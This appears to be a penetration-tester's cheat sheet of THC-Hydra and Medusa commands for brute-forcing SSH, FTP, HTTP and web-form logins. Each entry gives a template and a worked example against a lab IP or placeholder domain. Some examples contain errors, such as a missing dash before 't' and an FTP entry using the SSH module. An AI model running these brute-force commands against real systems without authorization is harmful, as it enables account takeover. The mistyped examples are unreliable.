PRIMARY CATEGORY → PASSWORD ATTACKS
SSH Authentication
THC-Hydra
hydra -v -t <THREADS> -U <USER_LIST> -P <PASSWD_LIST> ssh://<TARGET>:<PORT>e.g.
hydra -v t 64 -U user.list -P password.list ssh://10.10.10.5:2222
medusa -t <THREADS> -h <TARGET> -n <PORT> -U <USER_LIST> -P <PASSWD_LIST> -M sshe.g.
medusa -t 8 -h 10.10.10.5 -n 2222 -U user.list -P password.list -M ssh
FTP Authentication
THC-Hydra
hydra -v -t <THREADS> -U <USER_LIST> -P <PASSWD_LIST> ftp://<TARGET>:<PORT>e.g.
hydra -v t 64 -U user.list -P password.list ftp://10.10.10.5:2121
Medusa
medusa -t <THREADS> -h <TARGET> -n <PORT> -U <USER_LIST> -P <PASSWD_LIST> -M ftpe.g.
medusa -t 8 -h 10.10.10.5 -n 2121 -U user.list -P password.list -M ssh
HTTP Authentication
THC-Hydra
hydra -v -t <THREADS> -L <USER_LIST> -P <PASSWD_LIST> <TARGET> -s <HTTP_PORT> http-get <WEB_PATH>e.g.
hydra -v -t 64 -L user.list -P password.list www.domain.com http-get /
Medusa
medusa -v -t <THREADS> -h <TARGET> -n <PORT> -U <USER_LIST> -P <PASSWD_LIST> -M http -m GETe.g.
medusa -v -t 2 -h www.domain.com -n 8080 -U user.list -P password.list -M http -m GET
Web Login Form - HTTP POST Request
THC-Hydra
hydra -v -t <THREADS> -L <USER_LIST> -P <PASSWD_LIST> <TARGET> http-post-form "/<PATH>:<PARAM1>=^USER^&<PARAM2>=^PASS^:<CONDITION_STRING>"e.g.
hydra -v -t 64 -L user.list -P password.list www.domain.com http-post-form '/login:user=^USER^&pass=^PASS^:S=302' # S → Success condition
e.g.
hydra -v -t 64 -L user.list -P password.list www.domain.com http-post-form '/login:user=^USER^&pass=^PASS^:F=Invalid credentials' # F → Failing condition